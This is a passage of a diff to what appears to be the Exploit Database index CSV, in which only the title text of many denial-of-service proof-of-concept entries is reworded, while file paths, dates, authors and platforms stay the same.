Integrated 2.6 Ethernet Bus - Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0 @@ -2838,7 +2838,7 @@ id,file,description,date,author,platform,type,port 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0 22518,platforms/windows/dos/22518.html,"Microsoft 'Shlwapi.dll' 6.0.2800.1106 - Malformed HTML Form Tag Denial of Service",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0 -22535,platforms/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service",2003-04-24,"Positive Technologies",multiple,dos,0 +22535,platforms/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service Vulnerabilities",2003-04-24,"Positive Technologies",multiple,dos,0 22536,platforms/multiple/dos/22536.txt,"Opera 7.10 - Permanent Denial of Service",2003-04-24,"David F. Madrid",multiple,dos,0 22537,platforms/linux/dos/22537.c,"Libopt.a 3.1x - Error Logging Buffer Overflow (1)",2003-04-24,kf,linux,dos,0 22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0 @@ -2890,7 +2890,7 @@ id,file,description,date,author,platform,type,port 22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 22739,platforms/hardware/dos/22739.py,"Broadcom BCM4325 and BCM4329 Devices - Denial of Service",2012-11-15,CoreLabs,hardware,dos,0 22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0 / eDirectory 8.7 - HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",novell,dos,0 -22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service",2003-06-11,posidron,windows,dos,0 +22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service Vulnerabilities",2003-06-11,posidron,windows,dos,0 22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Denial of Service",2003-06-12,"Ziv Kamir",windows,dos,0 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 - Signal Handling Denial of Service",2003-06-14,LynX,windows,dos,0 22780,platforms/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",windows,dos,0 @@ -2947,7 +2947,7 @@ id,file,description,date,author,platform,type,port 22987,platforms/multiple/dos/22987.pl,"EveryBuddy 0.4.3 - Long Message Denial of Service",2003-08-05,"Noam Rathaus",multiple,dos,0 22991,platforms/hardware/dos/22991.txt,"D-Link DI-704P - Long URL Denial of Service",2003-08-06,chris@cr-secure.net,hardware,dos,0 22999,platforms/windows/dos/22999.pl,"Meteor FTP Server 1.2/1.5 - USER Memory Corruption",2003-08-08,zerash,windows,dos,0 -40405,platforms/multiple/dos/40405.txt,"Symantec rar Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write",2016-09-21,"Google Security Research",multiple,dos,0 +40405,platforms/multiple/dos/40405.txt,"Symantec RAR Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write",2016-09-21,"Google Security Research",multiple,dos,0 23042,platforms/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service",2003-08-20,"real Remoter",windows,dos,0 23045,platforms/linux/dos/23045.pl,"ViRobot Linux Server 2.0 - Exploit",2003-08-20,kf,linux,dos,0 23048,platforms/linux/dos/23048.txt,"Srcpd 2.0 - Remote Integer Overflow",2003-08-21,Over_G,linux,dos,0 @@ -3192,7 +3192,7 @@ id,file,description,date,author,platform,type,port 24267,platforms/windows/dos/24267.txt,"Microsoft Internet Explorer 6 - JavaScript Null Pointer Exception Denial of Service",2004-07-12,"Berend-Jan Wever",windows,dos,0 24275,platforms/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 - Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",unix,dos,0 24281,platforms/windows/dos/24281.pl,"Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service",2004-07-14,HexView,windows,dos,0 -24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 - 'web.tmpl Language' Parameter CPU Consumption (Denial of Service)",2004-07-15,dr_insane,multiple,dos,0 +24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)",2004-07-15,dr_insane,multiple,dos,0 24283,platforms/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 - Denial of Service",2004-07-15,dr_insane,multiple,dos,0 24288,platforms/windows/dos/24288.txt,"Symantec Norton AntiVirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 40398,platforms/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow",2016-09-19,"Google Security Research",windows,dos,0 @@ -3336,7 +3336,7 @@ id,file,description,date,author,platform,type,port 25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",multiple,dos,0 40819,platforms/linux/dos/40819.c,"Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos,0 40820,platforms/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos,0 -25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0 +25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service Vulnerabilities",2005-03-05,ports,windows,dos,0 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0 25231,platforms/windows/dos/25231.txt,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0 25234,platforms/linux/dos/25234.sh,"Linux Kernel 2.4.x/2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,dos,0 @@ -3467,7 +3467,7 @@ id,file,description,date,author,platform,type,port 26811,platforms/linux/dos/26811.c,"Linux Kernel 2.6.x - INVALIDATE_INODE_PAGES2 Local Integer Overflow",2005-12-13,"Oleg Drokin",linux,dos,0 26816,platforms/windows/dos/26816.pl,"AppServ Open Project 2.5.3 - Remote Denial of Service",2005-12-14,Rozor,windows,dos,0 26825,platforms/hardware/dos/26825.txt,"Linksys Routers - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 -26833,platforms/hardware/dos/26833.txt,"Multiple Unspecified Cisco Catalyst Switches - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 +26833,platforms/hardware/dos/26833.txt,"Cisco Catalyst Switches (Multiple Devices) - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26834,platforms/hardware/dos/26834.txt,"Westell Versalink 327W - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos,0 @@ -3506,13 +3506,13 @@ id,file,description,date,author,platform,type,port 27171,platforms/multiple/dos/27171.txt,"Sun ONE Directory Server 5.2 - Remote Denial of Service",2006-02-08,"Evgeny Legerov",multiple,dos,0 27196,platforms/multiple/dos/27196.txt,"IBM Tivoli Directory Server 6.0 - Unspecified LDAP Memory Corruption",2006-02-11,"Evgeny Legerov",multiple,dos,0 27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service",2006-02-14,ZwelL,multiple,dos,0 -27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple - Malformed Field Denial of Service",2006-02-14,ZwelL,multiple,dos,0 +27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities",2006-02-14,ZwelL,multiple,dos,0 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",multiple,dos,0 27232,platforms/hardware/dos/27232.txt,"Nokia N70 - L2CAP Packets Remote Denial of Service",2006-02-15,"Pierre Betouin",hardware,dos,0 27241,platforms/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,hardware,dos,0 27246,platforms/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,linux,dos,0 27253,platforms/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",linux,dos,0 -27257,platforms/linux/dos/27257.html,"Multiple Mozilla Products - iFrame JavaScript Execution Vulnerabilities",2006-02-22,"Georgi Guninski",linux,dos,0 +27257,platforms/linux/dos/27257.html,"Mozilla (Multiple Products) - iFrame JavaScript Execution Vulnerabilities",2006-02-22,"Georgi Guninski",linux,dos,0 27258,platforms/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service",2006-02-22,"Josh Zlatin-Amishav",asp,dos,0 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos,0 27292,platforms/windows/dos/27292.py,"EchoVNC Viewer - Remote Denial of Service",2013-08-02,Z3r0n3,windows,dos,0 @@ -3525,7 +3525,7 @@ id,file,description,date,author,platform,type,port 27420,platforms/multiple/dos/27420.c,"ENet - Multiple Denial of Service Vulnerabilities",2006-03-13,"Luigi Auriemma",multiple,dos,0 27421,platforms/multiple/dos/27421.txt,"GGZ Gaming Zone 0.0.12 - Multiple Denial of Service Vulnerabilities",2006-03-14,"Luigi Auriemma",multiple,dos,0 27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow",2006-03-16,"Josh Bressers",linux,dos,0 -27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 +27460,platforms/multiple/dos/27460.pl,"RealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 27474,platforms/multiple/dos/27474.txt,"LibVC - '.VCard' 003 Processing Buffer Overflow",2006-03-21,trew,multiple,dos,0 27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0 27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0 @@ -3608,7 +3608,7 @@ id,file,description,date,author,platform,type,port 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6 - String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0 28256,platforms/windows/dos/28256.html,"Microsoft Internet Explorer 6 - Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",windows,dos,0 28257,platforms/linux/dos/28257.txt,"GnuPG 1.4/1.9 - Parse_Comment Remote Buffer Overflow",2006-07-22,"Evgeny Legerov",linux,dos,0 -28258,platforms/windows/dos/28258.txt,"Microsoft Internet Explorer 6 - Multiple Object ListWidth Property Denial of Service",2006-07-23,hdm,windows,dos,0 +28258,platforms/windows/dos/28258.txt,"Microsoft Internet Explorer 6 - Multiple Object ListWidth Property Denial of Service Vulnerabilities",2006-07-23,hdm,windows,dos,0 28259,platforms/windows/dos/28259.txt,"Microsoft Internet Explorer 6 - NMSA.ASFSourceMediaDescription Stack Overflow",2006-07-24,hdm,windows,dos,0 28263,platforms/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 - Remote Denial of Service",2006-07-24,"J. Oquendo",windows,dos,0 28265,platforms/windows/dos/28265.txt,"Microsoft Internet Explorer 6 - Native Function Iterator Denial of Service",2006-07-24,hdm,windows,dos,0 @@ -3644,13 +3644,13 @@ id,file,description,date,author,platform,type,port 28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service",2006-09-01,"David Matousek",windows,dos,0 -28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 - 'Name' Parameter Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos,0 +28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 - 'Name' Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos,0 28513,platforms/windows/dos/28513.txt,"Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service",2006-09-12,"securma massine",windows,dos,0 28521,platforms/osx/dos/28521.txt,"Apple QuickTime 6/7 - '.FLC' Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,osx,dos,0 28542,platforms/multiple/dos/28542.pl,"Verso NetPerformer Frame Relay Access Device - Telnet Buffer Overflow",2006-09-13,"Arif Jatmoko",multiple,dos,0 28561,platforms/multiple/dos/28561.pl,"Blast XPlayer - Local Buffer Overflow (PoC)",2013-09-26,flux77,multiple,dos,0 28578,platforms/osx/dos/28578.txt,"Apple Mac OSX 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",osx,dos,0 -28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products - SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0 +28588,platforms/windows/dos/28588.txt,"Symantec (Multiple Products) - 'SymEvent' Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0 28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x - 'I386_Set_LDT()' Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - '.wav' Crash (PoC)",2013-09-30,xboz,windows,dos,0 28666,platforms/multiple/dos/28666.txt,"Call of Duty Server 4.1.x - Callvote Map Command Remote Buffer Overflow",2006-09-25,"Luigi Auriemma",multiple,dos,0 @@ -3705,7 +3705,7 @@ id,file,description,date,author,platform,type,port 29362,platforms/multiple/dos/29362.pl,"DB Hub 0.3 - Remote Denial of Service",2006-12-27,"Critical Security",multiple,dos,0 40960,platforms/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056)",2016-12-22,Skylined,windows,dos,0 29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",windows,dos,0 -29399,platforms/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflow",2007-01-06,LMH,linux,dos,0 +29399,platforms/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflows",2007-01-06,LMH,linux,dos,0 29402,platforms/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,hardware,dos,0 29406,platforms/solaris/dos/29406.c,"Sun Solaris 9 - RPC Request Denial of Service",2007-01-09,"Federico L. Bossi Bonin",solaris,dos,0 29441,platforms/osx/dos/29441.txt,"Apple Mac OSX 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 @@ -3781,7 +3781,7 @@ id,file,description,date,author,platform,type,port 29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7 - HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 29803,platforms/windows/dos/29803.pl,"Static HTTP Server 1.0 - Denial of Service",2013-11-25,GalaxyAndroid,windows,dos,0 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 - 'Assert()' Remote Denial of Service",2007-04-02,"Luigi Auriemma",linux,dos,0 -29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 +29810,platforms/windows/dos/29810.c,"Symantec (Multiple Products) - 'SPBBCDrv' Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 @@ -3843,7 +3843,7 @@ id,file,description,date,author,platform,type,port 30524,platforms/multiple/dos/30524.txt,"Soldat 1.4.2 - Multiple Remote Denial of Service Vulnerabilities",2007-08-23,"Luigi Auriemma",multiple,dos,0 30526,platforms/multiple/dos/30526.txt,"Vavoom 1.24 - sv_main.cpp Say Command Remote Format String",2007-08-24,"Luigi Auriemma",multiple,dos,0 30527,platforms/multiple/dos/30527.txt,"Vavoom 1.24 - str.cpp VStr::Resize Function Crafted UDP Packet Remote Denial of Service",2007-08-24,"Luigi Auriemma",multiple,dos,0 -30528,platforms/multiple/dos/30528.txt,"Vavoom 1.24 - p_thinker.cpp VThinker::BroadcastPrintf Function Multiple Field Remote Overflow",2007-08-24,"Luigi Auriemma",multiple,dos,0 +30528,platforms/multiple/dos/30528.txt,"Vavoom 1.24 - 'p_thinker.cpp VThinker::BroadcastPrintf' Multiple Remote Overflows",2007-08-24,"Luigi Auriemma",multiple,dos,0 30529,platforms/multiple/dos/30529.txt,"Media Player Classic 6.4.9 - FLI File Remote Buffer Overflow",2007-08-24,wushi,multiple,dos,0 30530,platforms/hardware/dos/30530.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",hardware,dos,0 30538,platforms/hardware/dos/30538.pl,"Thomson SpeedTouch 2030 - SIP Empty Message Remote Denial of Service",2007-08-28,"Humberto J. Abdelnur",hardware,dos,0 @@ -3870,7 +3870,7 @@ id,file,description,date,author,platform,type,port 30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,linux,dos,0 30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x - ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 30672,platforms/windows/dos/30672.txt,"Live for Speed - Skin Name Buffer Overflow",2007-10-13,"Luigi Auriemma",windows,dos,0 -30679,platforms/hardware/dos/30679.pl,"Nortel Networks - Multiple UNIStim VoIP Products Remote Eavesdrop",2007-10-18,"Daniel Stirnimann",hardware,dos,0 +30679,platforms/hardware/dos/30679.pl,"Nortel Networks - Multiple UNIStim VoIP Products Remote Eavesdrop Vulnerabilities",2007-10-18,"Daniel Stirnimann",hardware,dos,0 30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 30688,platforms/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - Reboot (Denial of Service)",2014-01-04,nicx0,hardware,dos,0 30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 - Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos,0 @@ -3927,8 +3927,8 @@ id,file,description,date,author,platform,type,port 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 -31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 -31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 +31128,platforms/multiple/dos/31128.txt,"IEA Software (Multiple Products) - POST Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 +31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String / Denial of Service Vulnerabilities",2008-02-11,"Luigi Auriemma",multiple,dos,0 31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 @@ -3936,9 +3936,9 @@ id,file,description,date,author,platform,type,port 31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,hardware,dos,0 31307,platforms/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0 -31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec - ActiveX 'Data' Parameter Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 -31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX 'Data' Parameter Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 -31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode - ActiveX 'Data' Parameter Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)",2014-01-31,"Kees Cook",linux,dos,0 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0 @@ -3955,7 +3955,7 @@ id,file,description,date,author,platform,type,port 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0 31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0 -31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 +31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Null Pointer Denial of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 31308,platforms/android/dos/31308.html,"Google Android Web Browser - '.BMP' File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow / Denial of Service",2008-02-27,"Luigi Auriemma",windows,dos,0 31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service",2008-03-01,"Maks M",windows,dos,0 @@ -3966,7 +3966,7 @@ id,file,description,date,author,platform,type,port 31361,platforms/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption",2008-03-07,anonymous,windows,dos,0 31363,platforms/windows/dos/31363.txt,"Panda Internet Security/AntiVirus+Firewall 2008 - 'CPoint.sys' Memory Corruption",2008-03-08,"Tobias Klein",windows,dos,0 31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 - Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 -31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter Null Pointer Denial of Service",2008-03-10,"Luigi Auriemma",multiple,dos,0 +31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Null Pointer Denial of Service",2008-03-10,"Luigi Auriemma",multiple,dos,0 31381,platforms/windows/dos/31381.txt,"Motorola Timbuktu Pro 8.6.5 - Multiple Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",windows,dos,0 31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0 @@ -3991,8 +3991,8 @@ id,file,description,date,author,platform,type,port 31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0 31607,platforms/windows/dos/31607.py,"SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service",2008-04-04,ryujin,windows,dos,0 31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial of Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0 -31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Parameter Denial of Service",2008-04-21,"Rodrigo Carvalho",osx,dos,0 -31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Parameter Denial of Service",2008-04-21,"Core Security Technologies",osx,dos,0 +31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Denial of Service",2008-04-21,"Rodrigo Carvalho",osx,dos,0 +31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Denial of Service",2008-04-21,"Core Security Technologies",osx,dos,0 31627,platforms/unix/dos/31627.c,"LICQ 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0 31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",windows,dos,0 31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial of Service",2008-04-10,ryujin,windows,dos,0 @@ -4040,7 +4040,7 @@ id,file,description,date,author,platform,type,port 31998,platforms/multiple/dos/31998.txt,"S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 - Multiple Remote Vulnerabilities",2008-06-28,"Luigi Auriemma",multiple,dos,0 31999,platforms/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x - Adding 'ibm-globalAdminGroup' Entry Denial of Service",2008-06-30,anonymous,multiple,dos,0 32000,platforms/linux/dos/32000.txt,"OpenLDAP 2.3.41 - BER Decoding Remote Denial of Service",2008-06-30,"Cameron Hotchkies",linux,dos,0 -32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service",2008-06-30,"Noam Rathus",multiple,dos,0 